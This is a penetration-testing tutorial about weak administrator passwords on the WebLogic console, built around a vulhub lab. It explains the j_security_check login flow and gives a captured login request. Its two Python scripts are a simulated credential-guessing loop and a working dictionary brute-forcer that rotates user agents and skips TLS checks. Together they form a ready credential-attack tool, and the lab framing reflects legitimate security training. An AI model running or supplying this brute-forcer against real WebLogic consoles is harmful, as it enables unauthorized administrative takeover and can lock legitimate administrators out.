This article was last updated 420 days ago; the information in it may have developed or changed since.
:::info
💘Full penetration-testing workflow:
Information gathering – vulnerability discovery – vulnerability exploitation – privilege escalation – tunnelling – intranet penetration – lateral movement – post-exploitation
:::
WebLogic vulnerabilities
📚Test environment
The vulhub weblogic/weak_password target environment.
Start the environment with docker-compose from the vulhub weblogic/weak_password directory.
Access test (reference: https://www.yuque.com/u2164633/eww48f/rhgirguw8myq83n5)
http://192.168.225.135:7001/console/login/LoginForm.jsp
📚Vulnerability principle
The WebLogic administration console (/console, port 7001 by default) authenticates with the servlet form-login mechanism: the login form posts j_username / j_password to /console/j_security_check, and the server answers with a 302 whose target tells the client whether the credentials were accepted. If the administrative account (weblogic in this environment) carries a weak or default password, anyone who can reach the console can guess it from a dictionary and obtain full administrative rights, which include deploying applications on the server. Two practical caveats: WebLogic compares passwords case-sensitively, and its default user-lockout policy locks an account for 30 minutes after 5 consecutive failed logins, so an unthrottled dictionary attack locks the administrator out before it finds the password.
📚POC example
```http
POST /console/j_security_check HTTP/1.1
Host: 192.168.225.135:7001
Content-Length: 68
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.225.135:7001
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.225.135:7001/console/login/LoginForm.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ADMINCONSOLESESSION=KyBwlkxSsYHhGGrt1KJbq4vjzz51fF3XYf7427mRSxM2Jh1pg1zt!1701480759
Connection: close

j_username=weblogic&j_password=oracle@123&j_character_encoding=UTF-8
```
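The whole check rests on telling apart the two 302 redirects that /console/j_security_check returns for the request above: a valid login is redirected to /console, a rejected one back to /console/login/LoginForm.jsp, and in both cases the body reads "It's now at <a href=...>". The following is an added example (not code from the original page or from vulhub) that isolates that decision and the `user:password` dictionary handling so they can be exercised offline, and adds one caveat a naive dictionary run ignores: WebLogic's default user-lockout policy (5 consecutive failures locks the account for 30 minutes), so guessing stops per user before that threshold. The `Response` class, `fake_weblogic_response`, `simulated_post` and `SAMPLE_WORDLIST` are constructed stand-ins for the lab, not captured traffic.

```python
import re
from dataclasses import dataclass, field
from typing import Callable, Iterable, Iterator, Optional, Tuple

# Constructed lab values (the lab address used on this page; not captured traffic).
BASE_URL = "http://192.168.225.135:7001"
SUCCESS_LOCATION = BASE_URL + "/console"                      # redirect on valid credentials
FAILURE_LOCATION = BASE_URL + "/console/login/LoginForm.jsp"  # redirect to the form error page


@dataclass
class Response:
    """The three fields of a requests.Response that the check needs."""
    status_code: int
    headers: dict = field(default_factory=dict)
    text: str = ""


def fake_weblogic_response(location: str) -> Response:
    """Build a 302 shaped like WebLogic's ("It's now at <a href=...>" body)."""
    body = f'<html><body>It\'s now at <a href="{location}">{location}</a></body></html>'
    return Response(302, {"Location": location}, body)


def extract_href(html: str) -> str:
    m = re.search(r'href="([^"]+)"', html)
    return m.group(1) if m else ""


def login_succeeded(resp: Response) -> bool:
    """Classify one j_security_check reply.
    Success: 302 to /console (the originally requested resource).
    Failure: 302 back to the form error page /console/login/LoginForm.jsp.
    A 200 (login page re-served) or 404 (no console) is never a success.
    The Location header is authoritative; the HTML body is only a fallback."""
    if resp.status_code != 302:
        return False
    target = resp.headers.get("Location", "") or extract_href(resp.text)
    return "/console" in target and "LoginForm.jsp" not in target


def parse_wordlist(lines: Iterable[str]) -> Iterator[Tuple[str, str]]:
    """Yield (user, password) from user:password lines. Split on the FIRST colon so
    a password containing ':' survives; skip blank lines and '#' comments."""
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        user, password = line.split(":", 1)
        yield user, password


def find_valid_login(post: Callable[[str, dict], Response], base_url: str,
                     wordlist: Iterable[str],
                     max_failures_per_user: int = 4) -> Optional[Tuple[str, str]]:
    """Try each pair through post(url, form_data) and return the first accepted one.
    WebLogic's default lockout policy locks an account after 5 consecutive failed
    logins (for 30 minutes), so stop guessing a user after max_failures_per_user
    misses instead of locking the administrator out."""
    url = base_url.rstrip("/") + "/console/j_security_check"
    failures = {}
    for user, password in parse_wordlist(wordlist):
        if failures.get(user, 0) >= max_failures_per_user:
            continue  # further guesses for this user would trip the lockout
        form = {"j_username": user, "j_password": password, "j_character_encoding": "UTF-8"}
        if login_succeeded(post(url, form)):
            return user, password
        failures[user] = failures.get(user, 0) + 1
    return None


# Constructed stand-in for the lab target: only weblogic / oracle@123 is accepted.
def simulated_post(url: str, form: dict) -> Response:
    ok = form["j_username"] == "weblogic" and form["j_password"] == "oracle@123"
    return fake_weblogic_response(SUCCESS_LOCATION if ok else FAILURE_LOCATION)


# Constructed dictionary in the user:password format the page's script reads.
SAMPLE_WORDLIST = ["# user:password", "weblogic:weblogic", "weblogic:weblogic1",
                   "weblogic:oracle@123", "admin:pa:ss"]

if __name__ == "__main__":
    print(find_valid_login(simulated_post, BASE_URL, SAMPLE_WORDLIST))
```

Against a real target, replace `simulated_post` with a callable such as `lambda url, form: requests.post(url, data=form, allow_redirects=False, timeout=10)`; `requests.Response` already exposes `status_code`, `headers` and `text`, so `login_succeeded` works on it unchanged.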
Vulnerability exploitation
V1.0
```python
#! /usr/bin/env python
"""
WebLogic weak password
url: /console/j_security_check
post body: j_username=weblogic&j_password=xxx&j_character_encoding=UTF-8
response: always a 302 whose body reads It's now at <a href="...">...</a>;
the redirect target is the signal:
success: 302 to http://192.168.225.135:7001/console
failure: 302 back to http://192.168.225.135:7001/console/login/LoginForm.jsp
"""
import datetime
from urllib.parse import urljoin

import requests
import urllib3
from fake_useragent import UserAgent
from rich import print as rprint

urllib3.disable_warnings()  # verify=False would otherwise warn on every request
ua = UserAgent()


def get_time():
    return datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")


def weblogic_weak_pwd(base_url, dict_path='updict.txt'):
    # dictionary: one user:password per line; split on the first ':' only so that
    # passwords containing ':' stay intact, and skip blank or malformed lines
    check_url = urljoin(base_url, '/console/j_security_check')
    with open(dict_path, 'r') as f:
        for line in f:
            line = line.strip()
            if not line or ':' not in line:
                continue
            username, password = line.split(':', 1)
            headers = {
                'User-Agent': ua.random
            }
            data = {
                "j_username": username,
                "j_password": password,
                "j_character_encoding": 'UTF-8'
            }
            # allow_redirects=False: the 302 target is the signal, so do not follow it
            response = requests.post(check_url, headers=headers, data=data,
                                     allow_redirects=False, verify=False, timeout=10)
            # the Location header is authoritative; WebLogic's HTML redirect body is the fallback
            target = response.headers.get('Location', '') or response.text
            if response.status_code == 302 and '/console' in target and 'LoginForm.jsp' not in target:
                rprint(
                    "[[bold green]" + get_time() + "[/bold green]] [[bold green]Success[/bold green]] > [bold yellow]"
                    + f" WebLogic login succeeded, username: {username}, password: {password} " + "[/bold yellow]")
                break
            else:
                # WebLogic locks an account after 5 consecutive failures by default,
                # so a long dictionary needs pacing or it locks the administrator out
                rprint(
                    "[[bold green]" + get_time() + "[/bold green]] [[bold red]Failed[/bold red]] > [bold yellow]"
                    + f" {username}:{password} rejected (or WebLogic console not reachable) " + "[/bold yellow]")


if __name__ == '__main__':
    base_url = "http://192.168.225.135:7001"
    weblogic_weak_pwd(base_url)
```